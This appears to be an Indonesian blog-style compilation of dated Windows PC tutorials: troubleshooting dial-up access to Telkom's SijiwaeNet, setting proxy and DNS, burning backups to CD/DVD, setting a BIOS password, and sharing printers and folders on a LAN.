Anda mendengar nada tone, tapi terputus-putus secara periodik. Kemungkinan anda (atau anggota keluarga lain) mengaktifkan layanan Fitur dari Telkom (misalnya Lacak / call forwarding). Tone seperti ini sebenarnya tidak masalah, tetapi anda harus merubah setting pada PC anda. Kalau anda tidak mau merubah setting, anda dapat me-nonaktifkan fitur ini pada saat akan menggunakan internet.

2. Coba dial ke 0809 8 9999
Setelah memastikan telepon anda baik dan mendapat tone yang sesuai, selanjutnya anda dapat mengecek panggilan. Angkat telepon, tekan nomor  0809 8 9999 lalu dengarkan nada jawab.

Apabila anda mendengar nada nada modem (tiiiiiittt…criiiiit..) panjang bersautan, berarti telepon anda telah bisa tersambung ke modem kami dan modem kami langsung menjawab secara otomatis (dengan mengeluarkan nada). Anda dapat melanjutkan ke langkah selanjutnya.

Anda tidak mendengar nada sibuk (tut..tut..tut). Kemungkinan saluran telepon kami sedang sibuk, coba beberapa saat kemudian (diulangi).
Apabila tetap sibuk, maka kemungkinan nomer telepon yang anda gunakan di-blok untuk akses ke 0809 (baik dilakukan oleh Telkom mapun oleh kantor Anda, biasanya untk membatasi tagihan terutama akses ke layanan permium call). Coba hubungi ke bagian PBX kantor anda agar membuka akses ke 0809. Telkom Jateng dan DIY sendiri biasanya telah membuka seluruh nomor telepon di Jateng dan DIY, kecuali nomor-nomor tertentu (atas permintaan pelanggan).

3. Lakukan instalasi modem dan software (bila belum dilakukan)
Langkah untuk melakuakan settign pada PC dapat dilihat di sini.

4. Lakukan dial via komputer ke 0809 8 9999, menggunakan login dan password.

Begitu tombol  Connect ditekan, maka akan muncul
Status: Dialing …, lalu muncul
Verifying username and password …
Bila semuanya lancar, maka anda akan terkoneksi ke server kami dengan kecepatan tertentu.

Keluar Status: Dialing …, lalu muncul Error 680: There is no dial tone. Cek kembali ke langkah 1. Apabila tone ada tapi tetap muncul error diatas, maka kemungkinan bunyi tone berubah karena menggunakan fitur tertentu (misal nya Lacak). Non aktifkan fitur tersebut, atau lakukan setting sebagai berikut :

Klik Start–>Setting–>Control Panel. Pilih icon Modem.
Pada window Modem Properties, pilih General klik / pilih modem yang telah terinstall, lalu klik Properties.
Pada window Nama_modem_anda Modem Properties, pilih Connections tab, pada Call preferences hilangkan /kosongkan tanda pada pilihan Wait for dial tone before dialing. Dengan setting ini, maka modem anda akan melakuan dialing walaupun dial tone tidak terdengar.

Keluar Status: Dialing …, lalu muncul  Error 676: The line is busy. Saluran modem kami mungkin sedang sibuk, coba beberapa saat kemudian. Apabila saluran sibuk terus, cek kembali langkah 2. Pastikan juga bahwa nomor dial anda benar yaitu 0809 8 9999 (tidak pakai area code tambahan).

Keluar Status: Dialing …, lalu muncul  Error 678: The computer you are dialing in to is not answering. Seluruh modem kami seharusnya langsung merespon, namu tidak tertutup kemungkianan beberapa nomer sedang tidak bekerja dengan lancar. Cobalah lagi beberapa saat kemudian. Apabila kondisi tersebut berlangsung terus, cek kembali langkah 2. Pastikan juga bahwa nomor dial anda benar yaitu 0809 8 9999 (tidak pakai area code tambahan).

Keluar Status: Verifying …, lalu muncul  User logon : Enter your username… Cek lagi lebih teliti username dan password, semuanya menggunakan huruh kecil.

5. Sudah konek, tapi koneksinya sering putus atau lambat (dibawah 14.400 kbps).
Koneksi yang sering putus dapat terjadi karena kurang baiknya jaringan atau anda mengaktifkan fitur Nadasela. Karena internet merupakan komunikasi data, maka gangguan sedikit pada perkabelan akan dapat berpengaruh. Karena itu pastikan perkabeln dalam rumah anda bagus dan permanen.

Fitur Nadasela akan memberikan nada yang mengganggu pada saat modem sedang online. Karena itu sebaiknya anda me-nonaktifkan Fitur Nadasela pada saat akan melakukan koneksi internet. Setelah selesai menggunakan internet, anda dapat mengaktifkannya lagi.

Kecepatan koneksi modem sangat bergantung pada kualitas jaringan. Pada lokasi tertentu, Telkom menggunakan pengganda saluran (1 kabel digunakan untuk beberapa nomor sekaligus) atau radio untuk melayani permintaan pelanggan. Penggunaan jenis saluran alternatif ini akan memperlambat kecepatan koneksi.

6. Sudah konek dengan kecepatan yang bagus, tapi tidak bisa browsing kemana-mana.
Coba lakukan setting proxy dan DNS yang benar, lihat di sini .

7. Sudah bisa browsing, tapi mau bisa e-mail.
Lihat petunjuk pemilihan dan setting mail di sini.

2. Pada kotak Dial-up settings, pilih SijiwaeNet (pilihan ini seharusnya muncul bila anda telah membuat seting dial up modem sebelumnya). Kemudian tekan tombol Settings. Maka akan muncul window SijiwaeNet Settings seperti dibawah.

3. Perhatikan pada kotak Proxy Server. Pada Use a proxy server, kotak pilihan dikosongkan (tidak diberi tanda). Artinya, kita memberikan seting agar browser tidak usah menggunakan proxy. Hal ini dilakukan karena untuk akses lewat SijiwaeNet, seluruh pengguna telah diset agar secara otomatis agar menggunakan proxy Telkom secara default, sehingga tidak perlu dilakukan seting.

Jangan lupa klik tombol OK. Maka seting proxy telah selesai.

Sekedar catatan.

Apa itu proxy ?

Proxy server merupakan server yang digunakan untuk menyimpan data web yang pernah diakses oleh pengguna. Manfaat dari proxy server adalah untuk mempercepat akses ke situs web.

Beberapa pengguna internet biasanya pernah mengakses situs informasi  yang sama. Sebagai contoh, setiap pengguna selalu mengakses suatu situs, misalnya Yahoo!.

Tanpa proxy, setiap pengguna harus melakukan akses langsung ke server Yahoo! di Amerika, pada informasi yang diambil sama.

Dengan adanya proxy server, pengakses yang akan melihat halaman Yahoo! tidak perlu harus selalu mengakses secara langsung ke server tersebut (yang letaknya di Amerika), tetapi cukup melihat pada cache proxy server setempat (di Indonesia).

Bagaimana informasi suatu web disimpan di proxy ?
Begitu salah seorang pengguna mengakses suatu situs, halaman situs tersebut akan secara otomatis tersimpan pada proxy server TelkomNet. Dengan demikian pengguna lain yang akan mengases situs yang sama tidak perlu harus melakukan akses langsung, cukup mengambilnya dari proxy server lokal.

*SETTING DNS

Fungsi dari setting DNS adalah untuk menentukan alamat IP server yang berfungsi sebagai Domain Name Server (server ini bertugas menerjemahkan alamat domain yang anda tuju). Setting ini sebaiknya anda lakukan, walaupun bukan merupakan kerharusan karena SijiwaeNet akan secara otomatis menentukan DNS server.
1. Klik dua kali icon My Computer, lalu klik dua kali icon Dial Up Networking

2. Klik kanan icon SijiwaeNet yang sudah dibuat sebelumnya, pilih Properties

3. Setelah keluar window SijiwaeNet, klik pada Server Types Tab. Perhatikan setting pada Advanced Options, lakukan seperti terlihat pada gambar.

4. Klik tombol TCP/IP Settings. Klik pada Specify name server address, lalu isikan sebagai berikut :
Masukkan Primary DNS : 202.134.0.155
Secondary DNS : 202.134.2.5

Melakukan backup file / Folder ke dalam CD / DVD

Backup adalah suatu Proses membuat Duplikasi atau salinan data. Proses backup sangat disarankan terutama pada file file yang sangat penting.

Backup sangat penting dilakukan secara rutin untuk mencegah hal hal yang tidak diinginkan, seperti kmputer terserang Virus, bencana alam dan lain lain. Salah satu media backup adalah kepingan CD / DVD, Media ini digunakan karena punya bentuk yang tipis, mudah disimpan dan dapat bertahan dalam jangka waktu yang lama (Kecuali ”Patah”)……dibutuhkan perangkat yang punya fasilitas untuk membaca dan tulis dalam media CD/DVD, misalnya CD-R (hanya bisa satu kali pakai) serta DC-RW atau DVD- RW (Bisa di backup sampai maksimal 3 kali Proses).

Berikut adalah Cara mem-BACKUP FILE atau FOLDER kedalam CD/DVD Drive :

– Cari folder atau media penyimpanan tempat data anda berada

– Lakukan prosedur penyalinan File dari tempat asal ke Drive CD/DVD berada.

– Lalu pilihlah menu BURN To DISC…..

– Ikuti langkah langkah yang tertera pada layar atau jangan lupa siapkan optiknya (CD-R, CD-RW atau DVD RW)

Ada beberapa software program untuk backup/Burn CD, salah satunya NERO, biasanya akan tampil beberapa pilihan untuk Burning pada layar monitor begitu Klik Nero, misalnya Back up untuk MP3, Video, data dan masih banyak lagi.

TIP/TRIK Meningkatkan Keamanan CD

Salah satu cara untuk mengamankan PC adalah dengan menggunakan password BIOS, Password BIOS digunakan sebelum anda menjalankan sistem operasi Komputer, WHY ?,……..karena pada BIOS Terdapat fasilitas untuk meng-enable dan men-disable beberapa sumber daya komputer kita.

Berikut adalah langkah langkah yang bisa ditempuh :

– Ketika Komputer anda sedang Booting, pada layar akan muncul kata ”PRESS DEL TO ENTER SETUP”.

– Segera tekan tombol DEL sehingga akan tampil menu BIOS

– Pilih Option ”SET USER PASSWORD” , Kemudian tekan ENTER sehingga tampil kotak ENTER PASSWORD.

– Ketikan Password yang anda pilih, lalu tekan ENTER.

– Pilih SAVE dan EXIT SET UP.

Sharing Printer

Dalam ulasan kali ini saya akan memaparkan langkah-demi-langkah setting printer agar dapat dipakai oleh beberapa komputer/klien dengan memanfaatkan fasilitas File and Printer Sharing punya Windows. Saya sengaja memuat kembali tulisan ini bagi rekan-rekan yang masih membutuhkan. Terlebih lagi cara ini bisa sangat menghemat penggunaan printer terutama untuk Lab, Kantor, Rental Komputer dan terutama untuk warnet seperti yang saya miliki.
Sebelum memulai langkah berikut saya asumsikan Anda telah menyiapkan jaringan LAN Anda. Masing-masing komputer sudah memiliki IP addres yang tepat dan tergabung daam sebuah workgroup. Di sini saya pakai nama default “WORKGROUP” untuk nama network yang saya gunakan.
Pada proses printer sharing ini ada dua tahap yang perlu dilakukan sebagai berikut:
Pertama, Membuka Fasilitas Sharing Printer pada komputer Host. Yang dimaksud dengan komputer host adalah komputer yang memiliki printer. Kalo di rental atau warnet, seringkali komputer host ini disebut sebagai server layanan. Printer yang ada di komputer inilah yang nantinya dibagi dan dipake rame-rame dengan memanfaatkan fasilitas File and Printer Sharing Windows. Namun ada baiknya Anda pastikan terlebih dahulu bahwa driver printer sudah terinstall dan dapat berjalan dengan baik. Selanjutnya lakukan langkah berikut:
1. Buka Control Panel > Printer and Faxes, klik kanan pada Printer Anda > Pilih Sharing. Dalam contoh ini saya pakai Printer Epson C90 Stylus Series.

2. Selanjutnya akan muncul Tab Sharing Properties seperti di bawah ini. Pastikan Anda memilih Checkbox Share this printer, Beri nama sesuka Anda dan akhiri dengan klik OK. Jika ada permintaan CD Windows, atau konfirmasi dari printer sharing, pilih “Just Enable File and Printer Sharing” dan Klik OK.

Sampai di sini setting komputer host sudah selesai.
Selanjutnya Tahap kedua, yakni Setting Printer di komputer klien. Berikut langkah-langkahnya:
1. Buka Control Panel > Printer and Faxes > Pada tab di sebelah kiri pilih Add a Printer. Lebih jelasnya perhatikan gambar berikut:

2. Selanjutnya akan terbuka Add Printer Wizard, Klik Next

3. Pilih tipe printer yang akan digunakan, pastikan Anda memilih Network Printer > Next

4. Browse printer pada jaringan Anda, pastikan Anda tidak salah alamat akhiri dengan Next

5. Komputer akan mengkonfirmasi apakah Printer Jaringan ini akan dijadikan Printer Utama? Pilih sesuai kebutuhan. Saya menyarankan Anda pilih Yes > Next

6. Akhiri Wizard dengan klik Finish.

Anda sudah berhasil mengkoneksikan komputer klien ke printer jaringan. Berikutnya, silakan Anda print sebuah dokumen dari komputer klien menggunakan printer yang baru saja Anda setting.

langkah-langkah Sharing Folder

1 ANDA buka my document sebelum anda memulai sharing buatkan folder baru lalu enter
2 setelah itu klik folder ygkita buat lalu klik file,pilih sharing and security
3 setelah muncul pilihan pilihlah sharing lalu pilih share this folder in the network
4 lalu pilih ok dan akan muncul tanda berbentuk tangan yg menyatakan bahwa folder telah disharing